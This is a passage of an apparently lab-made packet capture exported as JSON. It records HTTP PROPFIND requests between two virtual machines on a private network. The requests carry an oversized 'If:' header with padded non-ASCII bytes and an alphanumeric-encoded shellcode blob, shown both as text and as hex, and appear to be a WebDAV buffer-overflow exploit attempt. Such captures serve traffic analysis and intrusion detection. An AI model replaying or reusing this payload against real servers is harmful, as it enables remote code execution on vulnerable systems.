41:49:41:49:41:6a:58:41:51:41:44:41:5a:41:42:41:52:41:4c:41:59:41:49:41:51:41:49:41:51:41:49:41:68:41:41:41:5a:31:41:49:41:49:41:4a:31:31:41:49:41:49:41:42:41:42:41:42:51:49:31:41:49:51:49:41:49:51:49:31:31:31:41:49:41:4a:51:59:41:5a:42:41:42:41:42:41:42:41:42:6b:4d:41:47:42:39:75:34:4a:42:59:6c:48:68:61:72:6d:30:69:70:49:70:53:30:75:39:69:55:4d:61:59:30:71:54:74:4b:42:30:4e:50:52:6b:71:42:4c:4c:42:6b:50:52:4d:44:62:6b:73:42:6c:68:6c:4f:77:47:4d:7a:6d:56:4e:51:6b:4f:54:6c:6d:6c:51:51:71:6c:6c:42:4c:6c:4d:50:47:51:56:6f:5a:6d:6a:61:46:67:58:62:49:62:72:32:4e:77:52:6b:31:42:7a:70:44:4b:6d:7a:4f:4c:74:4b:50:4c:6a:71:71:68:4a:43:61:38:7a:61:38:51:50:51:74:4b:61:49:6d:50:49:71:67:63:74:4b:4d:79:5a:78:6b:33:4d:6a:6e:69:52:6b:4d:64:64:4b:4d:31:36:76:6e:51:59:6f:56:4c:66:61:58:4f:6a:6d:39:71:75:77:50:38:57:70:30:75:6c:36:4c:43:71:6d:39:68:4f:4b:61:6d:4e:44:43:45:47:74:6e:78:42:6b:4f:68:4d:54:4b:51:56:73:32:46:74:4b:4c:4c:50:4b:64:4b:4e:78:4b:6c:59:71:5a:33:74:4b:4c:44:44:4b:59:71:58:50:64:49:71:34:6e:44:6e:44:6f:6b:71:4b:53:31:70:59:31:4a:62:31:79:6f:4b:30:4f:6f:31:4f:51:4a:62:6b:5a:72:48:6b:72:6d:61:4d:62:48:4c:73:4c:72:59:70:6b:50:42:48:52:57:72:53:6c:72:61:4f:31:44:53:38:6e:6c:62:57:6d:56:6b:57:39:6f:48:55:74:78:56:30:4d:31:49:70:79:70:4b:79:69:34:4e:74:62:30:62:48:4e:49:75:30:30:6b:79:70:69:6f:49:45:4e:70:4e:70:50:50:32:30:31:30:32:30:61:30:6e:70:53:38:78:6a:4c:4f:47:6f:67:70:49:6f:77:65:46:37:50:6a:6b:55:53:38:55:70:77:38:31:34:6e:35:50:68:4c:42:69:70:6a:71:71:4c:72:69:58:66:71:5a:6c:50:72:36:62:37:70:68:33:69:74:65:61:64:71:51:4b:4f:77:65:43:55:45:70:64:34:4a:6c:59:6f:70:4e:39:78:62:55:48:6c:30:68:7a:50:57:45:56:42:52:36:79:6f:66:75:30:6a:39:70:51:5a:6b:54:71:46:52:37:6f:78:4b:52:79:49:66:68:6f:6f:39:6f:48:55:44:4b:70:36:33:51:5a:56:70:4b:71:48:30:4f:6e:72:62:6d:6c:4e:32:4a:6d:70:6f:78:4d:30:4e:30:79:70:4b:50:30:51:52:4a:69:70:70:68:70:58:36:44:30:53:6b:35:69:6f:47:65:42:6d:44:58:39:70:6b:51:39:70:4d:30:72:33:52:36:70:50:42:4a:4b:50:30:56:62:33:42:37:33:38:4b:52:78:59:46:68:31:4f:49:6f:48:55:39:71:55:73:4e:49:55:76:31:65:68:6e:51:4b:71:49:6f:6d:72:35:4f:67:34:49:59:4f:67:78:4c:50:6b:50:4d:30:79:70:30:6b:53:39:52:4c:70:6c:61:55:54:32:32:56:32:55:42:4c:44:34:52:55:71:62:73:35:4c:71:4d:62:4f:43:31:4e:70:31:67:50:64:6a:6b:4e:55:70:42:55:39:6b:31:71:38:6f:79:70:6d:31:39:70:4d:30:4e:51:79:4b:39:72:6d:4c:39:77:73:59:65:72:73:50:4b:32:4c:4f:6a:62:6b:6c:6d:46:34:4a:7a:74:6b:57:44:46:6a:74:6d:4f:62:68:4d:44:49:77:79:6e:39:30:53:45:37:78:4d:61:37:6b:4b:4e:37:50:59:72:6d:4c:79:77:63:5a:4e:34:49:77:53:56:5a:74:4d:4f:71:78:6c:54:4c:47:49:72:6e:34:6b:6f:31:7a:4b:64:6e:37:50:30:42:35:49:70:70:45:6d:79:42:55:6a:45:61:4f:55:73:41:41:3e:0d:0a:0d:0a"
|
||
},
|
||
"http": {
|
||
"PROPFIND / HTTP/1.1\\r\\n": {
|
||
"_ws.expert": {
|
||
"http.chat": "",
|
||
"_ws.expert.message": "PROPFIND / HTTP/1.1\\r\\n",
|
||
"_ws.expert.severity": "2097152",
|
||
"_ws.expert.group": "33554432"
|
||
},
|
||
"http.request.method": "PROPFIND",
|
||
"http.request.uri": "/",
|
||
"http.request.version": "HTTP/1.1"
|
||
},
|
||
"http.host": "192.168.68.1",
|
||
"http.request.line": "Host: 192.168.68.1\r\n",
|
||
"http.user_agent": "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)",
|
||
"http.request.line": "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n",
|
||
"http.content_length_header": "0",
|
||
"http.content_length_header_tree": {
|
||
"http.content_length": "0"
|
||
},
|
||
"http.request.line": "Content-Length: 0\r\n",
|
||
"http.request.line": "If: <http://192.168.68.1:80/sluvjwMNcYXbHkJfNFjJztHDHFcPbndonAjrLKLQvgqOCGgeJShJwjkDBrkxoqXEnW<6E><57><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>> (Not <locktoken:write1>) <http://192.168.68.1:80/tboupJftKVBpUGEtsRObWBdHjPNdCXyNXrpDHuxHIUaMdwTzFTPcjOvHxOiWpfUOHC<48><43><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>VVYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAIAQAIAQAIAhAAAZ1AIAIAJ11AIAIABABABQI1AIQIAIQI111AIAJQYAZBABABABABkMAGB9u4JBYlHharm0ipIpS0u9iUMaY0qTtKB0NPRkqBLLBkPRMDbksBlhlOwGMzmVNQkOTlmlQQqllBLlMPGQVoZmjaFgXbIbr2NwRk1BzpDKmzOLtKPLjqqhJCa8za8QPQtKaImPIqgctKMyZxk3MjniRkMddKM16vnQYoVLfaXOjm9quwP8Wp0ul6LCqm9hOKamNDCEGtnxBkOhMTKQVs2FtKLLPKdKNxKlYqZ3tKLDDKYqXPdIq4nDnDokqKS1pY1Jb1yoK0Oo1OQJbkZrHkrmaMbHLsLrYpkPBHRWrSlraO1DS8nlbWmVkW9oHUtxV0M1IpypKyi4Ntb0bHNIu00kypioIENpNpPP201020a0npS8xjLOGogpIoweF7PjkUS8Upw814n5PhLBipjqqLriXfqZlPr6b7ph3iteadqQKOweCUEpd4JlYopN9xbUHl0hzPWEVBR6yofu0j9pQZkTqFR7oxKRyIfhoo9oHUDKp63QZVpKqH0OnrbmlN2JmpoxM0N0ypKP0QRJipphpX6D0Sk5ioGeBmDX9pkQ9pM0r3R6pPBJKP0Vb3B738KRxYFh1OIoHU9qUsNIUv1ehnQKqIomr5Og4IYOgxLPkPM0yp0kS9RLplaUT22V2UBLD4RUqbs5LqMbOC1Np1gPdjkNUpBU9k1q8oypm19pM0NQyK9rmL9wsYersPK2LOjbklmF4JztkWDFjtmObhMDIwyn90SE7xMa7kKN7PYrmLywcZN4IwSVZtMOqxlTLGIrn4ko1zKdn7P0B5IppEmyBUjEaOUsAA>\r\n",
|
||
"\\r\\n": "",
|
||
"http.request.full_uri": "http://192.168.68.1/",
|
||
"http.request": "1",
|
||
"http.request_number": "1",
|
||
"http.response_in": "578"
|
||
}
|
||
}
|
||
}
|
||
},
|
||
{
|
||
"_index": "packets-2020-07-17",
|
||
"_type": "doc",
|
||
"_score": null,
|
||
"_source": {
|
||
"layers": {
|
||
"frame": {
|
||
"frame.interface_id": "0",
|
||
"frame.interface_id_tree": {
|
||
"frame.interface_name": "\\Device\\NPF_{A3208914-5057-4474-9535-A579B0FE0EE5}"
|
||
},
|
||
"frame.encap_type": "1",
|
||
"frame.time": "Jul 17, 2020 03:19:53.903313000 SE Asia Standard Time",
|
||
"frame.offset_shift": "0.000000000",
|
||
"frame.time_epoch": "1594930793.903313000",
|
||
"frame.time_delta": "0.000005000",
|
||
"frame.time_delta_displayed": "0.003730000",
|
||
"frame.time_relative": "17.154253000",
|
||
"frame.number": "586",
|
||
"frame.len": "259",
|
||
"frame.cap_len": "259",
|
||
"frame.marked": "0",
|
||
"frame.ignored": "0",
|
||
"frame.protocols": "eth:ethertype:ip:tcp:http",
|
||
"frame.coloring_rule.name": "HTTP",
|
||
"frame.coloring_rule.string": "http || tcp.port == 80 || http2"
|
||
},
|
||
"eth": {
|
||
"eth.dst": "00:0c:29:50:92:ec",
|
||
"eth.dst_tree": {
|
||
"eth.dst_resolved": "VMware_50:92:ec",
|
||
"eth.dst.oui": "3113",
|
||
"eth.dst.oui_resolved": "VMware, Inc.",
|
||
"eth.addr": "00:0c:29:50:92:ec",
|
||
"eth.addr_resolved": "VMware_50:92:ec",
|
||
"eth.addr.oui": "3113",
|
||
"eth.addr.oui_resolved": "VMware, Inc.",
|
||
"eth.dst.lg": "0",
|
||
"eth.lg": "0",
|
||
"eth.dst.ig": "0",
|
||
"eth.ig": "0"
|
||
},
|
||
"eth.src": "00:0c:29:53:25:34",
|
||
"eth.src_tree": {
|
||
"eth.src_resolved": "VMware_53:25:34",
|
||
"eth.src.oui": "3113",
|
||
"eth.src.oui_resolved": "VMware, Inc.",
|
||
"eth.addr": "00:0c:29:53:25:34",
|
||
"eth.addr_resolved": "VMware_53:25:34",
|
||
"eth.addr.oui": "3113",
|
||
"eth.addr.oui_resolved": "VMware, Inc.",
|
||
"eth.src.lg": "0",
|
||
"eth.lg": "0",
|
||
"eth.src.ig": "0",
|
||
"eth.ig": "0"
|
||
},
|
||
"eth.type": "0x00000800"
|
||
},
|
||
"ip": {
|
||
"ip.version": "4",
|
||
"ip.hdr_len": "20",
|
||
"ip.dsfield": "0x00000000",
|
||
"ip.dsfield_tree": {
|
||
"ip.dsfield.dscp": "0",
|
||
"ip.dsfield.ecn": "0"
|
||
},
|
||
"ip.len": "245",
|
||
"ip.id": "0x000021f2",
|
||
"ip.flags": "0x00004000",
|
||
"ip.flags_tree": {
|
||
"ip.flags.rb": "0",
|
||
"ip.flags.df": "1",
|
||
"ip.flags.mf": "0"
|
||
},
|
||
"ip.frag_offset": "0",
|
||
"ip.ttl": "64",
|
||
"ip.proto": "6",
|
||
"ip.checksum": "0x00000eaa",
|
||
"ip.checksum.status": "2",
|
||
"ip.src": "192.168.68.21",
|
||
"ip.addr": "192.168.68.21",
|
||
"ip.src_host": "192.168.68.21",
|
||
"ip.host": "192.168.68.21",
|
||
"ip.dst": "192.168.68.1",
|
||
"ip.addr": "192.168.68.1",
|
||
"ip.dst_host": "192.168.68.1",
|
||
"ip.host": "192.168.68.1"
|
||
},
|
||
"tcp": {
|
||
"tcp.srcport": "34959",
|
||
"tcp.dstport": "80",
|
||
"tcp.port": "34959",
|
||
"tcp.port": "80",
|
||
"tcp.stream": "81",
|
||
"tcp.len": "193",
|
||
"tcp.seq": "1449",
|
||
"tcp.seq_raw": "4037879143",
|
||
"tcp.nxtseq": "1642",
|
||
"tcp.ack": "1",
|
||
"tcp.ack_raw": "509094210",
|
||
"tcp.hdr_len": "32",
|
||
"tcp.flags": "0x00000018",
|
||
"tcp.flags_tree": {
|
||
"tcp.flags.res": "0",
|
||
"tcp.flags.ns": "0",
|
||
"tcp.flags.cwr": "0",
|
||
"tcp.flags.ecn": "0",
|
||
"tcp.flags.urg": "0",
|
||
"tcp.flags.ack": "1",
|
||
"tcp.flags.push": "1",
|
||
"tcp.flags.reset": "0",
|
||
"tcp.flags.syn": "0",
|
||
"tcp.flags.fin": "0",
|
||
"tcp.flags.str": "·······AP···"
|
||
},
|
||
"tcp.window_size_value": "502",
|
||
"tcp.window_size": "64256",
|
||
"tcp.window_size_scalefactor": "128",
|
||
"tcp.checksum": "0x00000543",
|
||
"tcp.checksum.status": "2",
|
||
"tcp.urgent_pointer": "0",
|
||
"tcp.options": "01:01:08:0a:89:ad:cc:a7:00:00:00:00",
|
||
"tcp.options_tree": {
|
||
"tcp.options.nop": "01",
|
||
"tcp.options.nop_tree": {
|
||
"tcp.option_kind": "1"
|
||
},
|
||
"tcp.options.nop": "01",
|
||
"tcp.options.nop_tree": {
|
||
"tcp.option_kind": "1"
|
||
},
|
||
"tcp.options.timestamp": "08:0a:89:ad:cc:a7:00:00:00:00",
|
||
"tcp.options.timestamp_tree": {
|
||
"tcp.option_kind": "8",
|
||
"tcp.option_len": "10",
|
||
"tcp.options.timestamp.tsval": "2309868711",
|
||
"tcp.options.timestamp.tsecr": "0"
|
||
}
|
||
},
|
||
"tcp.analysis": {
|
||
"tcp.analysis.initial_rtt": "0.000259000",
|
||
"tcp.analysis.bytes_in_flight": "1641",
|
||
"tcp.analysis.push_bytes_sent": "1641"
|
||
},
|
||
"Timestamps": {
|
||
"tcp.time_relative": "0.000545000",
|
||
"tcp.time_delta": "0.000005000"
|
||
},
|
||
"tcp.payload": "59:4f:67:78:4c:50:6b:50:4d:30:79:70:30:6b:53:39:52:4c:70:6c:61:55:54:32:32:56:32:55:42:4c:44:34:52:55:71:62:73:35:4c:71:4d:62:4f:43:31:4e:70:31:67:50:64:6a:6b:4e:55:70:42:55:39:6b:31:71:38:6f:79:70:6d:31:39:70:4d:30:4e:51:79:4b:39:72:6d:4c:39:77:73:59:65:72:73:50:4b:32:4c:4f:6a:62:6b:6c:6d:46:34:4a:7a:74:6b:57:44:46:6a:74:6d:4f:62:68:4d:44:49:77:79:6e:39:30:53:45:37:78:4d:61:37:6b:4b:4e:37:50:59:72:6d:4c:79:77:63:5a:4e:34:49:77:53:56:5a:74:4d:4f:71:78:6c:54:4c:47:49:72:6e:34:6b:6f:31:7a:4b:64:6e:37:50:30:42:35:49:70:70:45:6d:79:42:55:6a:45:61:4f:55:73:41:41:3e:0d:0a:0d:0a",
|
||
"tcp.segment_data": "59:4f:67:78:4c:50:6b:50:4d:30:79:70:30:6b:53:39:52:4c:70:6c:61:55:54:32:32:56:32:55:42:4c:44:34:52:55:71:62:73:35:4c:71:4d:62:4f:43:31:4e:70:31:67:50:64:6a:6b:4e:55:70:42:55:39:6b:31:71:38:6f:79:70:6d:31:39:70:4d:30:4e:51:79:4b:39:72:6d:4c:39:77:73:59:65:72:73:50:4b:32:4c:4f:6a:62:6b:6c:6d:46:34:4a:7a:74:6b:57:44:46:6a:74:6d:4f:62:68:4d:44:49:77:79:6e:39:30:53:45:37:78:4d:61:37:6b:4b:4e:37:50:59:72:6d:4c:79:77:63:5a:4e:34:49:77:53:56:5a:74:4d:4f:71:78:6c:54:4c:47:49:72:6e:34:6b:6f:31:7a:4b:64:6e:37:50:30:42:35:49:70:70:45:6d:79:42:55:6a:45:61:4f:55:73:41:41:3e:0d:0a:0d:0a"
|
||
},
|
||
"tcp.segments": {
|
||
"tcp.segment": "585",
|
||
"tcp.segment": "586",
|
||
"tcp.segment.count": "2",
|
||
"tcp.reassembled.length": "1641",
|
||
"tcp.reassembled.data": "50:52:4f:50:46:49:4e:44:20:2f:20:48:54:54:50:2f:31:2e:31:0d:0a:48:6f:73:74:3a:20:31:39:32:2e:31:36:38:2e:36:38:2e:31:0d:0a:55:73:65:72:2d:41:67:65:6e:74:3a:20:4d:6f:7a:69:6c:6c:61:2f:34:2e:30:20:28:63:6f:6d:70:61:74:69:62:6c:65:3b:20:4d:53:49:45:20:36:2e:30:3b:20:57:69:6e:64:6f:77:73:20:4e:54:20:35:2e:31:29:0d:0a:43:6f:6e:74:65:6e:74:2d:4c:65:6e:67:74:68:3a:20:30:0d:0a:49:66:3a:20:3c:68:74:74:70:3a:2f:2f:31:39:32:2e:31:36:38:2e:36:38:2e:31:3a:38:30:2f:50:75:6c:6b:41:55:70:4b:6c:4e:61:79:72:75:43:6a:6d:4f:71:53:50:4a:66:58:56:62:46:72:4d:54:50:61:4c:5a:48:50:4d:53:78:52:51:4d:6d:48:45:59:6d:48:41:69:4d:4f:72:41:69:73:58:78:43:4c:74:6d:67:4c:75:e5:a9:a2:e7:81:8c:e4:89:b1:e4:b9:96:e7:91:97:e4:bd:93:e5:a1:8f:e7:95:90:e4:bd:b8:e4:ad:a7:e6:8d:83:e6:a5:9a:e5:a1:8a:e7:8d:8b:e5:91:93:e7:9d:83:c8:82:c8:82:e1:8b:80:e6:a0:83:e6:8d:ae:e5:99:85:e7:a1:8b:e5:9d:b6:e4:9d:b1:e4:bd:8b:e7:85:ba:e4:b1:a1:e5:95:99:e4:85:b3:e5:8d:aa:e4:a5:96:e7:95:a7:e7:81:93:e5:99:a2:e6:ad:b3:e5:85:86:e5:89:ad:e4:99:a1:e7:a5:87:e1:8f:80:e6:a0:83:3e:20:28:4e:6f:74:20:3c:6c:6f:63:6b:74:6f:6b:65:6e:3a:77:72:69:74:65:31:3e:29:20:3c:68:74:74:70:3a:2f:2f:31:39:32:2e:31:36:38:2e:36:38:2e:31:3a:38:30:2f:55:57:54:61:6e:69:42:49:43:6b:61:72:77:5a:73:74:7a:70:53:55:64:72:6f:52:43:69:44:43:52:43:45:71:55:62:65:50:6d:4b:45:6e:6c:72:58:57:44:6f:6b:4f:51:51:63:66:61:4c:4f:43:71:53:43:50:74:44:48:70:63:e6:b1:99:e7:95:a4:e4:89:82:e6:8d:b8:e6:b1:8c:e4:91:b7:e4:a9:99:e5:89:97:e5:a5:ac:e6:9d:b2:e4:95:a7:e6:a5:ab:e6:95:b7:e6:9d:ac:e1:8f:80:e6:a0:83:ef:8e:8d:e7:9e:bd:e4:85:8c:e6:a5:85:e7:89:97:e4:b1:a3:e1:8f:80:e6:a0:83:e4:95:94:e7:81:95:e7:81:a9:e7:a1:b0:e4:89:8b:e4:9d:83:e5:8d:a4:e5:a1:87:e6:82:82:e6:a0:81:eb:81:ac:e7:9e:bc:ef:80:81:e7:9e:be:e2:95:a3:e7:9e:bb:e1:84:94:e7:9e:ba:ef:89:84:e7:9e:bb:e4:85:81:e4:85:81:ee:b8:a2:e7:9e:bb:e9:a0:81:e7:9e:bc:e2:89:a5:e7:9e:be:e2:95:a3:e7:9e:bb:e9:91:af:cf:80:ed:91:81:e7:9e:bd:e4:a3:93:e7:9e:bb:e2:87:a0:e7:9e:bf:ef:84:82:e7:9e:bb:ef:b0:82:e7:9e:bb:ef:80:81:e7:9e:be:e8:b0:84:e7:9e:bd:e8:b0:85:e7:9e:bd:e2:95:a3:e7:9e:bb:e9:91:8f:cf:80:ed:91:81:e7:9e:bd:e8:8a:85:e7:9e:bb:e2:95:a3:e7:9e:bb:e9:82:90:e9:82:90:e6:96:91:e7:9e:be:e5:b9:94:ec:9a:83:e4:84:8a:56:56:59:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:6a:58:41:51:41:44:41:5a:41:42:41:52:41:4c:41:59:41:49:41:51:41:49:41:51:41:49:41:68:41:41:41:5a:31:41:49:41:49:41:4a:31:31:41:49:41:49:41:42:41:42:41:42:51:49:31:41:49:51:49:41:49:51:49:31:31:31:41:49:41:4a:51:59:41:5a:42:41:42:41:42:41:42:41:42:6b:4d:41:47:42:39:75:34:4a:42:59:6c:48:68:61:72:6d:30:69:70:49:70:53:30:75:39:69:55:4d:61:59:30:71:54:74:4b:42:30:4e:50:52:6b:71:42:4c:4c:42:6b:50:52:4d:44:62:6b:73:42:6c:68:6c:4f:77:47:4d:7a:6d:56:4e:51:6b:4f:54:6c:6d:6c:51:51:71:6c:6c:42:4c:6c:4d:50:47:51:56:6f:5a:6d:6a:61:46:67:58:62:49:62:72:32:4e:77:52:6b:31:42:7a:70:44:4b:6d:7a:4f:4c:74:4b:50:4c:6a:71:71:68:4a:43:61:38:7a:61:38:51:50:51:74:4b:61:49:6d:50:49:71:67:63:74:4b:4d:79:5a:78:6b:33:4d:6a:6e:69:52:6b:4d:64:64:4b:4d:31:36:76:6e:51:59:6f:56:4c:66:61:58:4f:6a:6d:39:71:75:77:50:38:57:70:30:75:6c:36:4c:43:71:6d:39:68:4f:4b:61:6d:4e:44:43:45:47:74:6e:78:42:6b:4f:68:4d:54:4b:51:56:73:32:46:74:4b:4c:4c:50:4b:64:4b:4e:78:4b:6c:59:71:5a:33:74:4b:4c:44:44:4b:59:71:58:50:64:49:71:34:6e:44:6e:44:6f:6b:71:4b:53:31:70:59:31:4a:62:31:79:6f:4b:30:4f:6f:31:4f:51:4a:62:6b:5a:72:48:6b:72:6d:61:4d:62:48:4c:73:4c:72:59:70:6b:50:42:48:52:57:72:53:6c:72:61:4f:31:44:53:38:6e:6c:62:57:6d:56:6b:57:39:6f:48:55:74:78:56:30:4d:31:49:70:79:70:4b:79:69:34:4e:74:62:30:62:48:4e:49:75:30:30:6b:79:70:69:6f:49:45:4e:70:4e:70:50:50:32:30:31:30:32:30:61:30:6e:70:53:38:78:6a:4c:4f:47:6f:67:70:49:6f:77:65:46:37:50:6a:6b:55:53:38:55:70:77:38:31:34:6e:35:50:68:4c:42:69:70:6a:71:71:4c:72:69:58:66:71:5a:6c:50:72:36:62:37:70:68:33:69:74:65:61:64:71:51:4b:4f:77:65:43:55:45:70:64:34:4a:6c:59:6f:70:4e:39:78:62:55:48:6c:30:68:7a:50:57:45:56:42:52:36:79:6f:66:75:30:6a:39:70:51:5a:6b:54:71:46:52:37:6f:78:4b:52:79:49:66:68:6f:6f:39:6f:48:55:44:4b:70:36:33:51:5a:56:70:4b:71:48:30:4f:6e:72:62:6d:6c:4e:32:4a:6d:70:6f:78:4d:30:4e:30:79:70:4b:50:30:51:52:4a:69:70:70:68:70:58:36:44:30:53:6b:35:69:6f:47:65:42:6d:44:58:39:70:6b:51:39:70:4d:30:72:33:52:36:70:50:42:4a:4b:50:30:56:62:33:42:37:33:38:4b:52:78:59:46:68:31:4f:49:6f:48:55:39:71:55:73:4e:49:55:76:31:65:68:6e:51:4b:71:49:6f:6d:72:35:4f:67:34:49:59:4f:67:78:4c:50:6b:50:4d:30:79:70:30:6b:53:39:52:4c:70:6c:61:55:54:32:32:56:32:55:42:4c:44:34:52:55:71:62:73:35:4c:71:4d:62:4f:43:31:4e:70:31:67:50:64:6a:6b:4e:55:70:42:55:39:6b:31:71:38:6f:79:70:6d:31:39:70:4d:30:4e:51:79:4b:39:72:6d:4c:39:77:73:59:65:72:73:50:4b:32:4c:4f:6a:62:6b:6c:6d:46:34:4a:7a:74:6b:57:44:46:6a:74:6d:4f:62:68:4d:44:49:77:79:6e:39:30:53:45:37:78:4d:61:37:6b:4b:4e:37:50:59:72:6d:4c:79:77:63:5a:4e:34:49:77:53:56:5a:74:4d:4f:71:78:6c:54:4c:47:49:72:6e:34:6b:6f:31:7a:4b:64:6e:37:50:30:42:35:49:70:70:45:6d:79:42:55:6a:45:61:4f:55:73:41:41:3e:0d:0a:0d:0a"
|
||
},
|
||
"http": {
|
||
"PROPFIND / HTTP/1.1\\r\\n": {
|
||
"_ws.expert": {
|
||
"http.chat": "",
|
||
"_ws.expert.message": "PROPFIND / HTTP/1.1\\r\\n",
|
||
"_ws.expert.severity": "2097152",
|
||
"_ws.expert.group": "33554432"
|
||
},
|
||
"http.request.method": "PROPFIND",
|
||
"http.request.uri": "/",
|
||
"http.request.version": "HTTP/1.1"
|
||
},
|
||
"http.host": "192.168.68.1",
|
||
"http.request.line": "Host: 192.168.68.1\r\n",
|
||
"http.user_agent": "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)",
|
||
"http.request.line": "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n",
|
||
"http.content_length_header": "0",
|
||
"http.content_length_header_tree": {
|
||
"http.content_length": "0"
|
||
},
|
||
"http.request.line": "Content-Length: 0\r\n",
|
||
